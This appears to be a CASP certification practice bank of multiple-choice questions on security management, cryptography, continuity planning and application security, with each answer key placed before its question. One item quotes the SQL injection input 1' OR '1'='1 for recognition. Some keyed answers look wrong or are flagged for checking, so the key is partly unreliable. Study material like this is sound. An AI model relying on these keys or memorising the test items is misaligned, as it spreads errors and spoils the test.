CASP 2023 with verified questions and answers
C A security program alerts you of a failed logon attempt to a secure system. On investigation, you learn the system's normal user accidentally had caps lock turned on. What kind of alert was it? A. True positive B. True negative C. False positive D. False negative A Your security policy calls for the company's financial data archive to have its confidentiality, integrity, availability, and accountability protected. Presently it's stored on two redundant servers protected by strong passwords and transport encryption. What additional control would achieve your security goals? A. A version management system that tracks all user accounts and revisions B. Full-disk encryption C. Regular data backups D. Two-factor authentication B You work for a contracting company closely aligned with the US federal government. Which organization's publications are likely to be most closely related to your security compliance standards? A. CIS B. NIST C. NSA D. W3C B, E Your internal network is protected by a Cisco firewall between the WAN and the internal network. While its not having any problems, your supervisor suggests installing a Fortinet firewall between the Cisco firewall and the trusted LAN in order to create a new DMZ. Which security principles does this promote? A. Availability B. Defense in depth C. Security by design D. Security by obscurity E. Vendor diversity C You've found signs of unauthorized access to a web server, and on further review the attacker exploited a software vulnerability you didn't know about. On contacting the vendor of the server software, you learn that its a recently discovered vulnerability, but a hotfix is available pending the next software update. What kind of vulnerability did they exploit? Choose the best response. A. APT B. Structural C. Unknown D. Zero-day A Through your organization you've seen a pattern of attacks of different types. Login attempts, malware, phishing emails, application exploits, and so on. 
None of the individual techniques are that exotic or hard to stop, but they're seemingly endless and most seem to be the work of the same group of attackers. What kind of threat is this? Choose the best response. A. APT B. Structural C. Unknown D. Zero-day D For your new security consulting position, you're helping a hospital secure its HR database. It includes employee records such as contact information, employment history, and payment data. What would this information be classified as? Choose the best response. A. IP B. PCI C. PHI D. PII A You've been tracking a new form of malware on your network. It seems to primarily work by attacking web browsers when they visit certain external website. What parts of the network should your analysis focus on? Choose the best response. A. Endpoints B. Network Appliances C. SCADA devices D. Servers 5,2,1,4,6,3 Order the steps of a complete risk assessment. 1. Analyze business impact 2. Conduct a threat assessment 3. Create a mitigation strategy 4. Evaluate threat probability 5. Identify assets at risk 6. Prioritize risks B You're shopping for a new A/C unit for your server room, and are comparing manufacturer ratings. Which combination will minimize the time you'll have to go without sufficient cooling? Choose the best response. A. High MTBF and high MTTR B. High MTBF and low MTTR C. Low MTBF and high MTTR D. Low MTBF and low MTTR A A critical database is prone to occasional corruption issues due to application flaws. The corruption doesn't actually cause data loss, but it interrupts service and takes time to repair. Last year it happened four times, and the service disruptions caused a total of $120,000 in revenue loss. Using the past year for an estimate, if you include this threat into a quantitative risk assessment, what would the SLE be? Choose the best response. A. $30,000 B. $40,000 C. $120,000 D. $480,000 C You're performing a FIPS 199 impact analysis of a DBMS containing two separate databases. 
If SC_DB1 = { (confidentiality, MODERATE), (integrity, MODERATE), (availability, HIGH) } and SC_DB2 = { (confidentiality, LOW), (integrity, HIGH), (availability, LOW) }, how would you rate the impact for the DBMS itself? Choose the best response. A. { (confidentiality, MODERATE), (integrity, MODERATE), (availability, HIGH) } B. { (confidentiality, LOW), (integrity, HIGH), (availability, LOW) } C. { (confidentiality, MODERATE), (integrity, HIGH), (availability, HIGH) } D. { (confidentiality, MODERATE), (integrity, MODERATE), (availability, MODERATE) } A,B,E A multinational corporation is integrating multiple business units into a unified information system. Which of the following does it need to perform in order to do so? Choose all that apply. A. Analyze the benefits and drawbacks of centralizing network and security rules. B. Apply a unified standard to information sharing between business units. C. Ensure that all business units meet the same regulatory compliance standards. D. Ensure that all business units have compatible high level policies. E. Maintain independent security standards between business units wherever possible. E Your company has long maintained an email server, but it's insecure and unreliable. You're considering just outsourcing email to an external company who provides secure cloud-based email services. What risk management strategy would this represent? Choose hte best response. A. Risk acceptance B. Risk avoidance C. Risk deterrence D. Risk mitigation E. Risk transference A What element of your risk mitigation strategy helps keep future additions to your network from introducing new security vulnerabilities? Choose the best response. A. Change management B. Incident management C. Security Audits D. Technical controls A,B,E Your organization has a legacy application which uses 3DES encryption to communicate with a variety of remote systems, but newly enacted regulatory requirements specify a minimum of 128-bit AES for such links. 
Replacing it will be a big project, and for logistical and budgetary reasons it's certainly not doable this year. What information would be useful in requesting an exemption? Choose all that apply. A. A time frame in which you can replace the legacy system B. Additional security controls you can use to mitigate risk until AES encryption can be deployed C. Copies of corporate policies which specified 3DES for the system D. Reasons why AES encryption is not actually necessary for your security needs E. Technical reasons why AES encryption cannot be deployed at this time D Outages in a critical system cost your organization $250,000 in revenues a year. You're evaluating a high availability solution that should reduce outages by 80%. It will cost $150,000 to implement, and $50,000 per year to operate and maintain over the next five years. What is the expected TCO for the high availability solution? Choose the best response. A. $80,000 B. $150,000 C. $200,000 D. $400,000 B "Outages in a critical system cost your organization $250,000 in revenues a year. You're evaluating a high availability solution that should reduce outages by 80%. It will cost $150,000 to implement, and $50,000 per year to operate and maintain over the next five years." For the same solution , what is the estimated ROI? Choose the best response. A. 25% B. 150% C. 212.5% D. 400% B,D,E Which of the following would make useful KRIs during a risk analysis process? Choose all that apply. A. Average time required to complete an incident response report B. Cybersecurity funding relative to industry average C. System availability D. Testing rates for data backups E. 
Time required to implement security patches C,D You need to deploy a new web application firewall, and you're comparing different solutions according to what kinds of rules they can process, how many requests they can handle per second, how much they affect website response time, and how much training it takes for administrators to design and apply rules. What kind of metrics are not currently included in your comparison? Choose all that apply. A. Capability B. Latency C. Maintainability D. Scalability E. Usability D The last security audit showed that your firewall and IDS rules don't reflect the latest threats. What would be the most efficient way for you to fix the problem? Choose the best answer. A. Attend InfoSec World B. Browse the deep web C. Revise incident response processes to add detected threats to rule lists D. Subscribe to a threat feed B,E After finding some threat intelligence sources to improve your security systems, you still want to increase your readiness against zero-day threats. What technologies might be promising in doing so? Choose the two best responses. A.Big Data B.Machine learning C.RFCs D.Social media E.Threat modeling B You implemented a new network service based on an IETF Proposed Standard, and now the protocol it uses has been updated to an Internet Standard. You're comparing the updated RFC to the Proposed Standard you used. At a glance, what would tell you that you don't need to make any changes? Choose the best response. A.RFC and STD unchanged B.RFC unchanged, new STD added C.RFC and STD both change D.Errata marking the Proposed Standard as accepted in full. C You're providing security consulting for a software development team. Company policies suggest using OWASP guidelines as a primary source for application development. What threat modeling methodology should you recommend for the project? Choose the best response. 
A.OCTAVE B.PASTA C.STRIDE D.Trike B Your supervisor wants a methodical way to find missing or misconfigured security controls on your production network, but it's unfortunately full of critical services fragile enough to have problems when they receive excessive or non-standard traffic. This makes it important to use the least intrusive method possible. Which of the following would you recommend? Choose the best response. A. A black box penetration test B. A credentialed vulnerability scan C. A non-credentialed vulnerability scan D. A white box penetration test C,D,E You've been charged with overseeing a vulnerability scan. Which of the following actions are you likely to perform? Choose all that apply. A. Bypassing security controls B. Exploiting vulnerabilities C. Finding open ports D. Identifying vulnerabilities E. Passively testing security controls B While conducting a vulnerability assessment, you're given a set of documents representing the network's intended security configuration along with current network performance data. Which type of review are you most likely to perform? Choose the best response. A. Architecture review B. Baseline review C. Code review D. Design review C You're instructed to assist outside penetration testers by giving them complete documentation on your network and its configuration. What kind of test are they performing? Choose the best response. A. Black box B. Black hat C. White box D. White hat B Once a third-party penetration test begins, it's your job to secure the network and stop attacks before the penetration testers achieve their goal. What team are you on? Choose the best response. A. Black team B. Blue team C. Red team D. White team B,D While conducting a penetration test you've exploited an application flaw to get temporary access on a proxy server. Part of your goal is to use that server as a pivot. Which of the following steps directly achieve that goal? Choose all that apply. A. 
Creating a new account you can log in from again B. Creating a tunnel through the proxy server to the internal network C. Establishing administrative credentials D. Running a network scan from that server E. Searching through data folders on the server A The CIO wants you to plan a vulnerability scanning program. It's essential that it find as many vulnerabilities as possible while limiting excess network traffic. What type of solution would best suit your needs?Choose the best response. A. Agent-based credentialed scanning B. Agent-based non-credentialed scanning C. Agentless credentialed scanning D. Agentless non-credentialed scanning C Your SCAP-compliant vulnerability feed includes a long list of uniquely defined vulnerabilities. Which SCAP component is used to actually identify each vulnerability? Choose the best response. A. CCE B. CPE C. CVE D. OVAL C You're asked to generate a vulnerability report that shows the number and types of vulnerabilities and fixes you've encountered every month in the last year. What kind of report would that be? Choose the best response. A. Change report B. Scope report C. Trend report D. Workflow report A After running a vulnerability scan you learn that a number of the identified vulnerabilities don't actually exist on the system. What should you do? Choose the best response. A. Mark them as false positives B. Mark them as false negatives C. Mark them as low criticality D. File them as an SLA D Your latest vulnerability scan uncovered a serious and time-critical vulnerability, but you can't fix it immediately because the company change management process mandates a review period before making the necessary changes. What kind of remediation problem are you having? Choose the best response. A. Business process interruption B. Degrading functionality C. MOU D. Organizational governance C Your company is developing an application a private US-based hospital will use to give patients online access to their medical records. 
Regardless of what other data the application handles, what kind of compliance do you already know you need to research? Choose the best response. A. FERPA B. FISMA C. HIPAA D. PCI-DSS B,C A US government agency is planning to migrate some of its internally hosted data to a cloud-based service, and you need to make sure the proposed vendor can meet the same security requirements as the current solution. What are you currently practicing? Choose all that apply. A. Due care B. Due diligence C. FISMA compliance D. GDPR compliance E. GLBA compliance C Which framework incorporates five core publications forming a Service Lifecycle? Choose the best response. A. COBIT 5 B. ISO 27000 C. ITIL D. NIST CSF C Your company is contracting with a US Federal agency, and you have to make sure your solutions are compatible with their policy framework. Which framework are you most likely to become familiar with? Choose the best response. A. COBIT 5 B. ISO 27000 C. NIST 800 series D. NISF CSF D Coming in late to a meeting, you hear that one new cybersecurity framework under evaluation bases everything around the Architecture Development Model. What framework is likely being discussed? Choose the best response. A. COBIT 5 B. ITIL C. ISO 27001 D. TOGAF C You're working for an industrial equipment manufacturer that's in the process of developing closer ties with a key distributor. At the moment, the goals are to ensure that you're keeping open communications and adopting common standards in case you want to develop a more formal partnership later; for the time being, there won't be any legally binding agreement between you. What kind of policy document are you likely to end up designing? Choose the best response. A. BPA B. ISA C. MOU D. SLA B Your company has decided to outsource an application rather than develop it in-house. 
While you have a fairly strong idea of the business goals and security requirements it must satisfy, you don't know any off the shelf solution that would meet them. What kind of request should you assemble in order to begin the procurement process? Choose the best response. A. RFI B. RFP C. RFQ D. RMF A After a security incident due to a vulnerable mobile device, you're creating a formal configuration checklist that must be applied to all Android devices joined to the enterprise network. What term would best describe the policy document? Choose the best response. A. Benchmark B. Guideline C. Standard D. Procedure B Your company has signed a BPA with a business partner. What most likely isn't a part of it? Choose the best response. A. How liability is shared for a loss of shared assets B. Technical requirements for secured data connections between the two companies C. What happens to informational assets when the agreement is dissolved D. Who is responsible for maintaining informational assets A,B,E You're entering in a partnership with another organization that involves data sharing. What do you need to do before you enact it? Choose all that apply. A. Develop mutual review processes B. Establish data ownership rules C. Research adverse action guidelines D. Retire your existing privacy policy in favor of a jointly developed one E. Review applicable regulations and customer agreements to see what restricts data sharing in this case C What order are the steps of the Deming cycle? Choose the best response. A. Check, Plan, Act, Do B. Check, Plan, Do, Act C. Plan, Do, Check, Act D. Plan, Check, Do, Act B Your company just created the root certificate for its CA. Its private key won't be needed very often, so it will be stored in a safe when not needed. What security procedure could you use to make sure that no single employee can open the safe and get the key? Choose the best response. A. Cross training B. Dual control C. Manual review D. 
Separation of duties B During some building renovations, your facility has a lot of outside contractors coming and going while regular personnel handle sensitive documents. What kind of policy might help you reduce the chance of a data breach? Choose the best response. A. AUP B. Clean desk policy C. Dual controls D. Separation of duties B,D You recently discovered theft by an employee who would process and approve fraudulent business transactions with an external accomplice. The scheme had been going on for two years, since no one else was in a position to notice a series of small inappropriate transactions. Management wants new policies designed to prevent similar incidents in the future. What principles would directly further that goal? Choose all that apply. A. Clean desk policy B. Job rotation C. Least privilege D. Mandatory vacation E. Recertification B,E What are the benefits of a job rotation policy? Choose all that apply. A. Allows employees to discover each other's mistakes in multi-step processes B. Helps detect fraudulent activity over time C. Minimizes permissions given to any one employee D. Prevents data loss E. Trains employees more broadly D For regulatory compliance, you're required to use unique user IDs for all computer access, but there's one critical isolated system that doesn't actually support user-based access and must be used by multiple people. What might be a valid compensatory control? Choose the best response. A. Enabling system logging on that computer B. Encrypting all connections from that computer C. Placing a firewall between that computer and the network D. Using security cameras and a logbook to track access to the computer itself B A third-party team is going to formally examine your organization's overall security practices in order to make sure they meet regulatory compliance goals. Your organization may be fined if it fails. What would this verification process best be called? Choose the best response. A. Assessment B. 
Audit C. Certification D. Evaluation D You're using CMMI as a maturity model for application development. What maturity level are you at if you've just established organized testing and evaluation of security processes and controls for the application? Choose the best response. A. Defined B. Managed C. Optimizing D. Qualitatively Managed B What kind of security training is most important for a company executive? Choose the best response. A. Identifying malware symptoms B. Overall awareness of the organization's assets and threats to them C. Recognizing social engineering attacks D. Regular updates on evolving network threats D You're reviewing role-based training materials for a FISMA-compliant government agency. Who are you most likely to submit your feedback to once you're done? Choose the best response. A. The CCO B. The CIO C. The CISO D. The SAISO A Users should have both permission and need to access sensitive data, whether technically able to or not. True or false? A. True B. False D What kind of employee is most likely to need extra training about social engineering attacks? Choose the best response. A. Department manager B. Maintenance technician C. Network administrator D. Receptionist B On reviewing a software development project you've found that a novice programmer accidentally was storing passwords in plaintext. Fortunately the project hasn't gone into production yet, but what sort of cryptography should you specify for password storage? Choose the best response. A. Asymmetric encryption B. Hashing C. One-Time Pad D. Symmetric encryption 4,1,3,2 Order the following encryption ciphers from weakest to strongest. 1. 3DES 2. AES 3. Blowfish 4. DES C You had a network protocol configured to use a high-performance stream cipher, but some new flaws were found in your RC4 implementation and the CISO recommends moving to AES. Unfortunately the older system doesn't support AES acceleration, so performance is a possible bottleneck. 
What block cipher mode would both maintain high security and high performance? Choose the best response. A. CBC B. CFB C. CTR D. ECB B What asymmetric algorithm uses complex new mathematical approaches to create relatively short but very secure and high-performance keys? Choose the best response. A. DH B. ECC C. RIPEMD D. RSA C You've been researching a data breach in a system that transmits network data encrypted with a series of temporary session keys based on a long-term static key. The static key was compromised, then changed almost immediately, but you believe the attackers were able to use it to decrypt previously captured ciphertext. What encryption quality could you use to prevent similar issues in the future? Choose the best response. A. Elliptic curve cryptography B. Message authentication C. Perfect forward secrecy D. Steaganography B You're instructed to employ a cryptographic process that gives integrity, authenticity, and non-repudiation. What method would best suit those needs? Choose the best response. A. Diffie-Hellmann key exchange B. Digital signature C. Hashing D. HMAC D You've received an assortment of files along with accompanying hashes to guarantee integrity. Some of the hash values are 256-bit and some are 512-bit. Assuming they all use the same basic algorithm, what might it be? Choose the best response. A. MD5 B. RIPEMD C. SHA-1 D. SHA-2 A,C What is true of a digital certificate, but not true of a digital signature? Choose all that apply. A. Has a valid starting and ending date B. Proves the authenticity of a message C. Proves the authenticity of a person or system D. Provides non-repudiation E. Requires both an asymmetric key pair and a hashing algorithm D You want a purchase a certificate that will apply to , , and an upcoming server you haven't finalized a host name for yet. What kind of certificate is the best fit for your needs? Choose the best response. A. EV B. Qualified C. SAN D. 
Wildcard D You want a method to find revoked certificates without excessive network transfers or outdated results. What technology can you use? Choose the best response. A. ASN.1 B. CRL C. CSR D. OCSP A For e-discovery requirements you need to be able to decrypt any official communications used within your organization. This is a potential problem with certificate-based encryption systems that use private keys assigned to individual employees. What PKI method could you use to bring the organization into compliance? Choose the best result. A. Key escrow B. Key recovery C. PKI hierarchy D. Revocation C What certificate formats commonly use the web of trust model? Choose the best response. A. ASN.1 B. Bridge C. OpenPGP D. X.509 B An attacker's gotten a fraudulent certificate attesting to be for your application server and is planning to intercept your transactions in a man-in-the-middle attack. The certificate hasn't been revoked yet, but what technology could still let you know something is wrong? A. Escrow B. Pinning C. OCSP D. Stapling C On an IPsec VPN, what protocol negotiates security associations? Choose the best response. A. AH B. ESP C. IKE D. L2TP A,B,D What secure protocols add SSL/TLS security to protocols which were insecure on their own? Choose all that apply. A. FTPS B. HTTPS C. SFTP D. SNMPv3 E. SSH C You have an application layer firewall that isn't very useful because so much of the traffic you want to inspect has TLS encryption. What kind of security technology could you use to monitor that traffic? Choose the best response. A. Split tunnel B. SSL accelerator C. SSL decryptor D. VPN concentrator D You're setting up NAS file sharing, and want a protocol that allows Kerberos authentication and AES-HMAC signing while maximizing compatibility. Which protocol is best suited to your needs? A. NFSv3 B. NFSv4 C. SMBv2 D. 
SMBv3 C,D A policy calls for specific folders on a computer to use file-based encryption, but you need to write guidelines recommending specific technologies for use in your mixed Windows/Linux environment. What encryption tools should you recommend? Choose all that apply. A. Bitlocker B. dm-crypt C. eCryptFS D. EFS E. SED D Three virtual machines are running on the same physical server, and each controls a logical data partition on the same physical disk. You want to protect all three with encryption. What method gives strong but flexible protection to your data? Choose the best response. A. Back all encryption keys up to a USB drive B. Encrypt the entire physical disk C. Replace the drive with a self-encrypting disk D. Separately encrypt each logical partition D What cryptographic tool is commonly built into a motherboard? A. FDE B. DLP C. HSM D. TPM B,E Your company is completely overhauling its ERP systems, but due to the nature of your business it needs a lot of customized development. Management wants the new solution to be "standards-compliant and secure" but sometimes that's easier said than done. Which of the following would you recommend when advising the development team? Choose all that apply. A. Choose de facto standards only when de jure standards are unavailable B. Choose de jure standards only when de facto standards are unavailable C. Choose open standards where possible because they are free to use D. If an outdated standard is at odds with best security practices, propose adhering strictly to the standard E. If an outdated standard is at odds with best security practices, propose adding compensating controls A,E You're securing a network that was designed with resilience in mind. Critical services are distributed across multiple locations, using different host types and software to reduce the impact of any single event. The problem is that the pieces don't work very well together and the whole is hard to manage. 
Without fundamentally removing the resilience goals of the network, what design steps can you recommend to integrate the network? Choose all that apply. A. Deploy a CMDB for change management and incident response B. Deploy a CMS for central management C. Implement high availability systems D. Install redundant storage to improve data persistence E. Redesign component interfaces using SOA principles D You've been instructed to examine the code of an application before using it, in order to make sure it contains promised security features and doesn't contain any hidden features. It's closed source, and the manufacturer won't share the code with you. How could you best examine code in a human-readable format? Choose the best response. A. Consult OEM documentation B. Monitor the application closely in a sandbox environment C. Perform a core dump while running the application in a VM D. Use a decompiler on the executable file B,C,E To reduce the labor costs and security risks of server provisioning and deprovisioning, your datacenter is moving to a more flexible and automated virtualization infrastructure. Which recommendations and security risks should you list in your evaluation of the project? Choose all that apply. A. As long as a server's security impact has been evaluated thoroughly on provisioning, it's safe to repurpose it without further evaluation. B. Servers should not be deprovisioned until administrators have verified their removal won't impact business operations C. Virtual servers must be documented as thoroughly as physical servers. D. Virtualization makes it less likely you'll leave data remnants during the deprovisioning process. E. Virtualization makes it more likely you'll permanently delete valuable data during the deprovisioning process. A,C,D While developing a web application, you're defining security requirements. Which of the following would be valid non-functional requirements? Choose all that apply. A. Ability to maintain 99.99% uptime B. 
An online password reset page C. Data sanitization following all user input D. HIPAA-compliant protection of all PHI E. Protection from web application attacks A,C You're designing data sanitization procedures for each type of media used in your organization, and you've been instructed to use physical degaussing when appropriate. What types of media can the degausser securely sanitize? Choose all that apply. A. Backup tapes B. CDs and DVDs C. Hard drives D. Paper documents E. SSDs A,B You're using a new "big data" platform to manage a large collection of customer data and public records. In addition to the list of security controls the CISO ordered you to investigate, the CPO wants to know how the transition might affect privacy concerns. Which of the following should you examine, from either a regulatory compliance or business ethics standpoint? Choose the two most likely concerns. A. Whether data aggregation features assemble identity information that could be classified as PII B. Whether data storage and access falls within multiple jurisdictions covered by different privacy laws C. Whether the less automated nature of big data puts customer data under more personal scrutiny D. Whether the nature of the big data platform makes it impossible to assign a privacy officer A Your organization has a critical database full of customer PII, and a new employee was just authorized to use it. How would you best describe the role of the system administrator who configures user permissions in the database software? A. Data custodian B. Data owner C. Data steward D. Privacy officer A Your datacenter's Fibre Channel LAN hasn't been meeting availability and performance requirements due to network connectivity problems. What features could you explore to boost availability? Choose the best reply. A. Active/active multipathing B. Deduplication C. LUN masking D. 
Root squashing A,C Implementing a SAN has boosted storage performance and flexibility, but made it hard to compartmentalize sensitive data. You want hosts in different security zones to connect to the same SAN, with each host only able to communicate with storage devices in its own zone. What changes should you make? Choose all that apply. A. Create VSANs for each zone B. Deploy a separate NAS for each zone C. Enable LUN masking D. Switch from Fibre Channel to iSCSI E. Use target-based deduplication C Your facility is in a flood prone area, and the CEO wants a plan that will allow you to move operations to a temporary site in the event of flooding. What document will definitely need to be revised? Choose the best response. A. BCP B. BIA C. COOP D. DRP D Which document is a business most likely to have more than one of? Choose the best response. A. BCP B. BIA C. COOP D. DRP D What began as revising flood preparedness procedures has led to a complete evaluation of how to maintain business operations in the wake of a catastrophic storm. As part of the process, the CISO wants to conduct a "structured walkthrough." What kind of test would this be? Choose the best response. A. Checklist test B. ISCP C. Simulation test D. Tabletop exercise A,C,D Which of the following RAID levels incorporates disk striping? A. RAID 0 B. RAID 1 C. RAID 5 D. RAID 10 A,E A critical server uses a RAID 5 array for its primary storage, but new security guidelines recommend retiring and replacing all RAID 5 installations. Performance isn't a major concern, but you'd like to reduce cost. What is the problem with the current system, and what replacement should you use? Choose one of each. A. RAID 5 arrays are prone to failure during rebuild processes B. RAID 5 has no redundancy features C. RAID 5 provides low capacity for a given number of disks D. You should implement RAID 1 E. You should implement RAID 6 F. 
You should implement RAID 10

[C] You have a critical database server that constantly backs its files up to the cloud, but its software environment is so finicky that if it encountered a critical failure it would take a long time to get it working again. How would you describe your recovery plan for that service? A. High RPO and high RTO B. High RPO and low RTO C. Low RPO and high RTO D. Low RPO and low RTO

[A] Clustering is similar to load balancing, but tends to use tighter integration between redundant systems. True or false? A. True B. False

[A] Your company rents a spare server room in a secondary location. It has all necessary hardware, software, and network services, and you just need to load the latest backups to get it in operation. What is it? Choose the best answer. A. Hot site B. Hot spare C. Cold site D. Cold spare

[C] In terms of time, how does a differential backup plan generally differ from an incremental backup plan? A. It's quicker both to create backups and to restore data B. It's quicker to create backups, but slower to restore data C. It's slower to create backups, but quicker to restore data D. It's slower both to create backups and to restore data

[D] What backup type might require specific operating system support? Choose the best response. A. Differential B. Full C. Incremental D. Snapshot

[A] You're deploying a new Linux server. It will run a sensitive process which, according to policy requirements, must operate in an encrypted secure enclave so that even a compromised driver or kernel can't view or interfere with it. What security step will most directly accomplish this goal? Choose the best response. A. Configure Intel SGX for the process B. Enable SELinux C. Sign the process and add it to the UEFI allowed signature database D. Use the TPM's remote attestation feature

[A,D] As part of upgrading and reconfiguring a Linux server, you've switched to a distribution that has Security Enhanced Linux installed by default.
What benefits can you expect from the upgrade? Choose all that apply. A. Ability to restrict root permissions B. Direct compatibility with Windows NT ACLs C. Improved firewall and HIPS D. MAC enforcement throughout the operating system E. Verified Evaluation Assurance Level

[1: Child OU (SQL); 2: Organizational unit (Servers); 3: Domain; 4: Site (North Central); 5: Local server] Your Active Directory system applies group policies on several levels, so sometimes it's hard to be certain exactly which apply to a given computer. One server has overlapping policies applying from five GPOs, so you're making a priority list for administrators to keep in mind when making policy changes. Order the following GPOs from 1 to 5, where 1 overrides all others. 1. Child OU (SQL) 2. Domain 3. Local server 4. Organizational unit (Servers) 5. Site (North Central) (Group Policy is processed in the order local, site, domain, OU, child OU, and when two GPOs set the same value the one processed last wins, so the child OU GPO has the highest precedence and local policy the lowest. The answer key's "3,5,2,4,1" lists the items in that processing order. This ordering assumes no Enforced links and no Block Inheritance on the OUs, both of which change the outcome.)

[C] A factory production line is controlled by specialized expansion cards on an old PC. Compatibility with those cards and their control software requires an outdated operating system that's no longer receiving security updates. What is the most important step you should take to ensure the system's security? Choose the best response. A. Apply heavy monitoring to the system B. Design user procedures to compensate for weak operating system security C. Place it on an isolated secure network D. Install the most advanced host-based firewall supported by the operating system

[C] Security analysts keep discovering unauthorized software on a secure network. While it can indirectly compromise security, the software isn't actually malicious and antivirus software doesn't block it. Management wants a solution that can prevent software from running unless it's on the approved list. What method will get the best results? A. Application blacklisting B. Application sandboxing C. Application whitelisting D. Trusted execution environments

[A] A number of employees, including some administrators, have been tricked into installing fraudulent software.
One recent attack you heard about was a modified Ethernet driver that reports on network activities. What security control is intended to protect against such an attack? Choose the best response. A. Code signing B. Firewall C. HIDS D. Trusted hardware

[D] What potential security risk does an SD card pose that a USB thumb drive does not? Choose the best response. A. Data exfiltration B. Malware C. Photographs of sensitive areas D. Wireless attacks

[D] As your organization moves toward a more unified mobile device policy, an administrator mostly familiar with Active Directory asks if there is a way to centrally manage security policies like Group Policy objects. What kind of technology do you recommend? Choose the best answer. A. Asset tracking B. BYOD C. GPS D. MDM

[C,D,F] You're working with a team to develop a new mobile device policy for the contractors that frequently come and go from your company. While contractors and other employees use mobile devices to store sensitive data and PKI certificates used for authentication, they much prefer to use their own devices rather than a company-issued model. At the same time, with so many devices on the market, IT staff doesn't want to support every possible option. For contractors in particular, easy onboarding and offboarding is desirable. What deployment model and security features should you include in the policy? Choose all that apply. A. Establish a BYOD model B. Establish a COPE model C. Establish a CYOD model D. Distribute certificates with SCEP E. Secure PKI certificates with tokenization F. Use containerized data storage

[B,D] What are important security steps on all mobile devices? Choose all that apply. A. Configuring antivirus software B. Configuring remote backup features C. Installing a firewall app D. Regularly applying operating system updates E. Using biometric authentication

[B] What kind of policy governs removal of sensitive data and credentials when a user device is no longer used for company business? A.
Asset tracking B. Offboarding C. Onboarding D. Storage segmentation

[A] A critical vulnerability just hit the news: it allows an attacker to compromise mobile devices through several popular models of fitness tracker. Rather than take any chances, you've decided to use MDM to block company smartphones from connecting to such trackers until you've verified that no employees use affected models. What protocol do you need to disable? Choose the best response. A. ANT B. GSM C. NFC D. SATCOM

[C] What model would describe a cloud accounting service? Choose the best response. A. IaaS B. PaaS C. SaaS D. SDN

[D] While your organization has been virtualizing a wide range of physical hardware, one challenge is a high security network with software that makes heavy use of a hardware cryptoprocessor for RNG functions as well as key storage and remote attestation backed by a hardware root of trust. What feature could you use to virtualize these functions? A. HCI B. SDN C. VDI D. vTPM

[B] You're helping a software development team choose a secure cloud-based solution. They want to develop their own custom web applications, but prefer the development environment itself to be provided by the hosting service. What kind of service model should you evaluate? Choose the best response. A. IaaS B. PaaS C. SaaS D. Any of the above

[C] What kind of virtualization relies on a "master image"? Choose the best response. A. Bare metal B. Container C. Non-persistent VDI D. Persistent VDI

[D] Your organization has decided to outsource a number of IT services to a cloud provider. They're hosted outside your enterprise network, but you want to centrally manage all authentication, encryption, activity logging, and other security policies for connections between local computers and the cloud. What security solution would address these issues? A. On-premise policies B. Private deployment C. Security as a Service D.
Security broker

[A] An attack on your web application began with a long string of numbers sent to a field that's only supposed to hold a four-digit variable. What kind of attack was it? Choose the best response. A. Buffer overflow B. Integer overflow C. LDAP injection D. XSRF

[D,E] You're working with the red team in a gray box penetration test against a set of web application servers. According to your research of provided documentation and initial reconnaissance, the network protocols and web servers themselves seem to be well-hardened, but you think the back-end database systems might have some vulnerabilities. What attacks should the rest of the team use to reach past the web servers and target the databases? Choose all that apply. A. Command injection B. Cross-site scripting C. Session hijacking D. SQL injection E. XML injection

[C (author's note: check this one)] An outside attacker exploited a web application vulnerability to gain elevated privileges and alter data for other users. Normally authorization controls would prevent such an action. As you review the access logs, none of the individual requests sent by the attacker were unusual. What kind of vulnerability should you look for in the application? Choose the best response. A. Buffer overflow B. Injection C. Race condition D. Request forgery

[C] An IDS sends you an alert with a form input to a web application. When you view the packet, the form input itself reads 1' OR '1'='1. What kind of attack does this most likely indicate? Choose the best response. A. Buffer overflow B. Cross-site scripting C. Injection D. Integer overflow

[A,C] You're hardening your web application against cross-site scripting. The lead developer assures you that with the new input sanitization routines the front-end server won't allow executable scripts to be stored in the database. What kind of XSS attacks might still affect your users? Choose all that apply. A. DOM based B. Persistent C. Reflective D.
XSRF

[B,D,F] For an upcoming project your team is trying to decide between a SOAP and RESTful development approach. From a security and maintenance perspective, what advice can you give them? Choose all that apply. A. REST allows more powerful security features B. REST is generally fast and scalable C. REST requires a strict XML implementation D. SOAP allows more powerful security features E. SOAP is generally fast and scalable F. SOAP requires a strict XML implementation

[A,E] The developers of an application have decided that the first release to users will have limited core functions, and new functionality will be added through a succession of small incremental releases until the product is mature. As a security consultant, your goal is to make sure security remains a goal through each successive release. What development model should the team use, and what challenge will there likely be as a consequence of that model? Choose one of each. A. Agile B. Spiral C. Waterfall D. Initially chosen security requirements may change before deployment E. It will be more difficult to maintain accurate documentation through the process F. The model has a lot of management overhead, especially for a simple project

[A,C,E] You're reviewing a web application. Which of these features are security warning signs? Choose all that apply. A. Input errors are logged and clearly displayed to users in full detail. B. The web server and database software are on separate physical servers, both similarly secured. C. Input validation is performed more rigorously on the client side than the server side. D. The HTTPOnly flag is set on session cookies. E. Secret cookies are used to prevent XSRF attacks.

[A] You're researching a recent XSS attack against a web application. The developer showed you the JavaScript code used to sanitize and validate input in the browser; even if you're not a coder, it seems like it would have prevented the attack.
What is the most likely reason the web application was vulnerable? Choose the best response. A. Client-side validation can be easily bypassed. B. Input validation doesn't reliably protect against XSS attacks. C. Server-side validation can be easily bypassed. D. The attacker performed an injection attack to bypass input validation.

[B] You've just rebuilt the back end of an application to boost server performance, and you're ready to test the new version. What kind of test would discover if the changes caused any problems with existing security features? Choose the best response. A. Protocol fuzzing B. Regression test C. Stress test D. User acceptance test

[D] The development team has just created a control flow graph for a new application. What stage of development are they in? Choose the best response. A. Manual code review B. Provisioning C. Security requirements definition D. Static code analysis

[A,D] SSH connectivity through the network to the server at 10.10.200.5 is inconsistent, so you're evaluating router ACLs. Which of the following are likely to cause connectivity problems? Choose all that apply. A. A rule that denies access to port 22 on all networks followed by a rule that permits all SSH traffic to the 10.10.200.0 subnet. B. A rule that denies access to port 22 on the 10.5.100.0 subnet followed by a rule that permits access to port 22 on the 10.10.200.0 subnet. C. A rule that permits access to port 22 on the 10.10.200.0 subnet followed by a rule that denies access to port 22 on all subnets. D. Deny any any at the beginning of an ACL. E. Deny any any at the end of an ACL.

[B] You manage a public-facing server that's intermittently hammered by massive DDoS attacks. It doesn't host any critical services, but the traffic volume degrades other network performance. What's the easiest and most reliable way to protect overall network functions when the next attack occurs? Choose the best reply. A. Configure stateful filtering rules B. Set up a destination-based RTBH C.
Set up a source-based RTBH D. Subscribe to a scrubbing service

[A] You're configuring a router, and want it to check the source properties of incoming traffic before passing it on. What will this require? Choose the best response. A. Configuring ACLs B. Configuring routing tables C. Either would have the same effect D. Only a fully featured firewall can do this.

